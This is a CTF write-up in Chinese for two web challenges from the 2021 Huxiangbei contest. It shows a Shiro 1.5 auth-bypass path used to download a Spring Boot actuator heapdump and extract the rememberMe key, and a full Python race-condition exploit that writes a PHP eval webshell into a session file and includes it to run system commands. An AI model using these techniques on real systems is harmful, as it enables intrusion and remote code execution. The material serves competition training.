2021第七届湖湘杯-web-wp
Web2 Pentest in Autumn
题目给的附件Pom.xml
Pom.xml 中有actuator
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator
Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下)
由于没有权限,接下来访问都是302
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env
(信息泄露)
Shiro1.5 鉴权绕过去下载文件
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/health
把文件都下载下来
下载heapdump
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/heapdump
利用 visualvm 打开下载的heapdump文件
https://visualvm.github.io/download.html
全局搜索org.apache.shiro.web.mgt.CookieRememberMeManager
将byte转换成base64形式的key
import base64
import struct
res = base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', 58,5,22,5,117,45,-35,82,-15,62,-57,117,-78,15,23,-89))
print(res)
(参考:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)
CB链,Spring回显
Web1 easywill
题目没有给源码,根据描述从网上下一份easywillV2.1.5(https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/)
首页中assign可控两个参数,其中根据view函数发现覆盖变量cfile
尝试session包含
Exp
# coding=utf-8
import io
import requests
import threading
sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post(url,
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
files={'file': ('midi.txt', f)}, cookies={'PHPSESSID': sessid})
def read(session):
while True:
resp = session.post(url+'?name=cfile&value=/tmp/sess_' + sessid,
data=data)
if 'midi.txt' in resp.text:
print(resp.text)
event.clear()
else:
pass
if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()